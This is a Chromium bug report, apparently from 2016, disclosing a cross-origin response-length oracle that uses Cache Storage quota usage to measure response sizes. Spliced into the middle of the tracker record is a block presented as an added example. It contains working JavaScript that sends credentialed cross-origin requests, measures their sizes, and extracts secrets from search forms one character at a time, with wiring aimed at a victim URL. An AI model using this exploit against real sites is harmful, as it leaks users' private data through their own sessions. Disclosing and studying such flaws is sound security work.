Security: Cross-origin Response Length Oracle Attack
Reported by
serif...@gmail.com,
Oct 25 2016
Issue description

VULNERABILITY DETAILS

A same-origin script can perform a cross-origin request using fetch while including cookies, save the response to the CacheStorage, and measure the response size using quota usage (navigator.webkitTemporaryStorage.queryUsageAndQuota). The cross-origin response uses the same-origin quota. Any cross-origin HTTPS GET resource's response size can be leaked to the attacker. In our attack, we see the exact content size after transmission, once Transfer-Encoding is processed (response deflated). We even recognize a one-byte difference between responses.

In contrast to the "HTTP Encrypted Information can be Stolen through TCP-windows" (HEIST) attack, our attack does not require server-side parameter reflection and is stealthy, using only a single, stable, authenticated request measurement.

Using the knowledge of the response sizes, we can exfiltrate sensitive information from cross-origin web services while abusing the user's session, including:

- Steal any custom tokens and private messages whenever the server application responds using any custom response compression and a single parameter is reflected, using a similar method to HEIST.
- Any GET search form which works using a partial search word and has no CSRF token is vulnerable. The attack works similarly to a linear comparison attack: search all single-character candidates, choose the letter which causes the ~largest~ response, and then figure out the next letter. Using this method, you can exfiltrate any text which is in the scope of the search.
- Test whether the user has an active session on any web site.
- Figure out other knowledge about the user's session(s).

VERSION

Chrome Version: [54.0.2840.71] [stable]
Operating System: Windows 10

REPRODUCTION CASE

The POC implementation is in the attachment. The implementation must be launched from an HTTPS site.

Example run:

URL1: https://example.com/a (Content-Length: 286)
..
<h1>Not Found</h1>
<p>The requested URL /a was not found on this server.</p>
..

URL2: https://example.com/aa (Content-Length: 287)
..
<h1>Not Found</h1>
<p>The requested URL /aa was not found on this server.</p>
..

Measurements:

0.13ms: Targeting URL: https://example.com/a
65.69ms: Bytes: 0.000804901123046875MB (=844 bytes)
65.90ms: Targeting URL: https://example.com/aa
126.31ms: Bytes: 0.0008068084716796875MB (=846 bytes)
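The technique the report describes, as an added example written for this page (it is not the reporter's attached POC and not Chromium code). Part (1) is the browser-side size oracle built from fetch with credentials, Cache Storage and quota usage; part (2) is the linear comparison loop for the "GET search form with partial matching" case, which tries every candidate character and keeps the one producing the largest response. Part (2) runs offline against a constructed stand-in for the victim search endpoint; the alphabet, the record set, the page and row byte counts, the cache name and the victim URL are all assumptions.

```javascript
// Added example for the technique described in the report above; it is not the
// reporter's attached POC. Two parts: (1) the browser-side size oracle built from
// fetch + Cache Storage + quota usage, and (2) the linear comparison loop that
// drives such an oracle against a prefix search form. Part (2) is exercised
// offline here against a constructed stand-in for the victim service.

const ALPHABET = 'abcdefghijklmnopqrstuvwxyz0123456789-'; // assumed candidate set

// (1) Browser primitive. Only runs inside Chrome on an HTTPS attacker page.
// Opaque (no-cors) responses are stored against the attacker origin's own quota,
// so the quota delta around cache.put() reveals the cross-origin body size.
async function measureCrossOriginSize(url) {
  const usage = () => new Promise((resolve, reject) =>
    navigator.webkitTemporaryStorage.queryUsageAndQuota(
      (usedBytes) => resolve(usedBytes), reject));
  const cache = await caches.open('size-oracle'); // assumed cache name
  const before = await usage();
  const resp = await fetch(url, { mode: 'no-cors', credentials: 'include' }); // victim cookies attached
  await cache.put(url, resp);
  const after = await usage();
  await cache.delete(url); // keep the baseline stable for the next measurement
  return after - before;
}

// (2) Linear comparison against a size oracle. sizeOf(query) -> bytes, sync or
// async. At each position every candidate character is tried; the one producing
// the largest response extends the prefix. When all candidates yield the same
// size, no record extends the prefix any further and the value is complete.
async function extractViaSizeOracle(sizeOf, alphabet, maxLen) {
  let prefix = '';
  while (prefix.length < maxLen) {
    const sizes = [];
    for (const ch of alphabet) sizes.push([ch, await sizeOf(prefix + ch)]);
    const largest = Math.max(...sizes.map(([, n]) => n));
    const smallest = Math.min(...sizes.map(([, n]) => n));
    if (largest === smallest) break;
    prefix += sizes.find(([, n]) => n === largest)[0];
  }
  return prefix;
}

// Constructed stand-in for the victim: a GET search that returns every record
// beginning with q, rendered with fixed page chrome and per-row markup.
// The byte counts are assumptions; only the relative sizes matter to the attack.
function makeSearchOracle(records, pageBytes = 600, rowBytes = 24) {
  return (q) => {
    const hits = records.filter((r) => r.startsWith(q));
    return pageBytes + hits.reduce((n, r) => n + rowBytes + r.length, 0);
  };
}

// Wiring the two halves together in a browser would look like this (assumed URL):
//   const sizeOf = (q) =>
//     measureCrossOriginSize('https://victim.example/search?q=' + encodeURIComponent(q));
//   extractViaSizeOracle(sizeOf, ALPHABET, 32).then(console.log);

// Offline run against the simulated service (records are constructed sample data).
extractViaSizeOracle(makeSearchOracle(['x4k9q-reset', 'hello']), ALPHABET, 32)
  .then((value) => console.log('recovered:', value));
```

The offline run recovers the longest matching record character by character, costing one request per candidate per position (alphabet size times secret length). Against a real service the oracle sees the transferred size, so content compression changes the per-character deltas and repeated measurements may be needed to separate them from noise; the stand-in ignores compression. Chrome later padded the quota accounting of opaque responses in Cache Storage, so on a current browser part (1) no longer returns the exact body size.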
Feb 24 2018

This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by elawrence@chromium.org, Oct 25 2016

Components: Blink>Storage>Quota
Summary: Security: Cross-origin Response Length Oracle Attack (was: Security: Cross-origin Length Oracle Attack)